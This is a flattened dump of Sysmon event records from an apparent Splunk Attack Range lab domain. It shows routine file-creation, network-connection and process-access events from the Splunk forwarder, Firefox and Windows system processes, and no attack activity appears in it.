Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6293B328110553363086D6405B5F8819,SHA256=BEB7E1E31FA5CFB1E69B5B93D27A06B7C24364F1F5829394B1549CCCBE46878E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046662Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:11.321{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=877C05754C3E7122AAFCFBDE4999FF41,SHA256=BE1FF4F4ED132492E9B6541157478B55978D357AD8F152F7528AC2EF0AAA5BA6,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806433Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:12.895{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A750B83597AD35AD69A1AD6D9EB3EEA,SHA256=D51227233A66622846A85364365481CC3981357F99C807127F5410FC87A856CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046663Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:12.339{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F33FEE15B7E2EC9E01201671D0D88CF8,SHA256=106299AC093A61FBA79F6E8D0B5CEB1A27E42A70163AA5C2C96FCBE463921D42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806434Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:13.907{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0DE4857B5BC9604301A1E2DA5C45B8F,SHA256=DC71B8B18B52F82EC9A10D1CDAF4AD9B4C0F8FB160699006BFC08B29B9FCEA88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046664Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:13.370{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F27C38673A419C4284683668CBE05227,SHA256=5907EA52EB3E55EB5A0D550A080771EA2ACBD107064532EDDD158FC304634658,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806435Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:14.938{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2A63F55BEE6F9FAAA54DC84A9443A41,SHA256=64E5F53CF75FFAED246A8F0F74F2D96E2877819C296EFDF919D11E68B4016190,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046665Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:14.385{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C900A4A76D875CC9450561AF0132894,SHA256=268579EA414D8BA1B033EAC0BF35A66551A4F3206FCB8D7219241A1CC939BAB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806437Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:15.985{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41C1CC2230B504B5D35DF8642E2CE3D9,SHA256=AA3C33F49250609581B6E3E77A816E0201B6EABB8ABB4D6E15D331C10A6E19AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046668Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:15.400{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C773094C4B9204C047D92B8803ADAEE7,SHA256=EE22A9E6B5245E8F782225635084B0365AE8A89612F22A2BFEB22331B25FE017,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806436Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:14.337{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57186-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001046667Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:15.369{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9157EF08F5618D8BE42A815D647BD25C,SHA256=FDD4506C3350659944955BAAAFB5AC985C888AA1923F55C94884D951C99ED656,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046666Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:15.369{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=01E2065938BBE440FEFEB60BA4722A1D,SHA256=7C03BE3E918D57FD1CC498BBCF0FC89DAFE73F50D6222BE75B31630645F77556,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046672Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:08.622{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50938-false10.0.1.12-8000- 354300x80000000000000001046671Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:07.908{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50937-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001046670Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:07.908{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50937-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001046669Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:16.421{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA3ED35F45E867208498E8E8B2BEFF68,SHA256=AE3117CBB1ED263BFD7275285F639A242EC1B38C698B6A7FF5953DADE4128D82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046684Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:17.698{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B70B008472171444522812C3BB0EAA63,SHA256=EFA97A8F9296F6CF8F87F0F85B4C51BA385C6AB23A21372603048508D03A172A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046683Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:17.698{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=911CEBD0475B5933CE3EE252D08CD97B,SHA256=CB96D0133BBF380616C08EEF9960B5E1B38FCEB271F3FBEB5520C89747EFDDB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046682Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:17.698{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=ECED7715627E6A345E50E90A405C2F04,SHA256=10664B2055EB3197CE0AD2D7962F243A0B5C360A628525AA0B935CC47A760EE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046681Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:17.698{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3AD982EC0C8CF9B1A738F126CA289671,SHA256=E29DCA0D5D162C63B980713AF4F0A9D9D83AE6896A2079C7CC907CCD6598D7FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046680Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:17.698{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=ABB5A2FB36BCD46416194B8A17C03A61,SHA256=DEAD0D2ABB37CF9ED3C1EC8A8611182DAFF731788907FD279EB21D8B16AD9A77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046679Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:17.698{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=72887CE320B03B51ABE217229918DCE6,SHA256=BB8FB3C874DEE07D02AB0F7F87D2DCBCDC35695C4BF3524CCCB105DC9D64D714,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046678Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:17.698{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C450B31BEB0205EF7893256062B8026B,SHA256=941C0B567853E5BD54BD738773E2B01E3518036C25D9F62D12A0B057E1907E8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046677Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:17.698{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A70428FE3887C72B874A35E157F9B7A1,SHA256=AD612D51619E0A7DE63FBEF4BCBC16E8B24EC9F1716EC7B7A3C3B720F2F62B94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046676Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:17.698{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F2FB32B56002262DAAF5907594E5DED6,SHA256=E481E79580C3DF12C9FB130E4EA0854C6185695B3E62AAE5310F3FE7E1E441A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046675Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:17.698{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=624B4DC8C0201256DB14AC31C2396FFC,SHA256=837FADEBC6F7EA0EA27EEA3A0CB4401763E5442472C2A25DE60751F19DF73C9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046674Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:17.698{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=EEEE7D9F616589E5520D33F6F1AD3505,SHA256=1FBC528D79503A697933A055BC2A6974301A695D2776BAA5FC4F5C68FDC1743A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046673Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:17.435{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A6E2055C4EDDE02FD1886EC1CB63431,SHA256=AB9D085A5D632758662A51A0591FE004DB9514FAB2B853A78FC7CD2D7A301677,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806438Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:17.032{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DFCDB62B4C834189CCE0CF29202A4C6,SHA256=E6290C8D94C7ADD6A9BD62561CBBD95B546227C713CA6FCEAC9CF39FE0DDFF75,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001046686Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:18.450{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F11C537FF859D24FFE246F99C85F7D24,SHA256=56AB9062427CE84E322F04B52CF5B16D72373514AC6916BB80BC1F3E42BCEAFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806439Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:18.063{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ECBB0B2722BEE36F9489616C315E450,SHA256=9C1F21DFE41CE4DC9A3C6DCB117653C7EA93A47FD84E786C582F440BB0C9E8FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046685Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:18.198{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046687Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:19.465{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07C098B9E35AF4F279E94799DE0F14A0,SHA256=C6681F09F043C9C2BFB05FD78E1C89B2D42755980E3E0C171E469C1ED21E97D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806440Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:19.079{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8F6863720EC6CF0E96694008E77AAC7,SHA256=AF3F258A25C993EA3CE0B149232E8EE96E3DF501B46B6A24621230140168B81B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046688Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:20.495{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3E98173A3F61E267E2F9912F1838893,SHA256=03C26FAC7086242074DECCD73B04F3646282A20E4B7D24698447213D3AAC8439,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806442Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:20.360{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806441Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:20.079{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F190E31F121AD861D933B0AA3C7933C6,SHA256=748F62CDE55F74027923465C66838D6EF12C52E4BF7FCAE2F12E084FF9C96684,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046690Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:13.733{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50939-false10.0.1.12-8000- 23542300x80000000000000001046689Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:21.515{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8424B0E97B4865142B343F46E095251,SHA256=9B75C1E65D85EA7EC0B649E81C987D048153AEAA1105442D94B0953262F69A4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806443Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:21.110{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D79C95E04FD20144ACB48E5FB1B2E98C,SHA256=CCE028F3E51BAE5F62CA32D2050657C9DD7FAC56D407830987F38A37B1CDB871,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046691Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:22.531{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F6ECCA643F2018B9CEBC5039D54EB04,SHA256=41B3DD55FFFFEBC62BCF6A99C7C0E41F21F191B37218977B272154D9A24D3C05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806446Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:22.157{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD5F2104E0F3099C0B3D12BD07406FAD,SHA256=6017AFA7FF267D2B271495B98A0D49A9E960F7AF9C5723F1BDABB0932A663758,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806445Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:20.493{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57188-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000806444Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:20.259{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57187-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001046692Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:23.546{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DB6BEC7A712BACCA945E97037A05CCC,SHA256=5608B113073C45A150EBE87C3E94ACC248DE7D30F7256BE05A3426CEBE20F304,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806447Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:23.173{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23C49D6CB31732CFCF4DAD1EC1BB2090,SHA256=6BD7AFF281C5F5BF0DCC3C10BAD6EFBF820A65264AFA5E1C298859D4CCF15A11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046693Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:24.561{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DA37CC67380B306A205F8AA698F5F3E,SHA256=F55655DAB24CFCB889D5334D0B32EEE9C82C4BB19717B109C3510E70B9F11545,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806475Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.923{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F350-60EB-4A79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806474Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:24.923{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806473Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.923{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 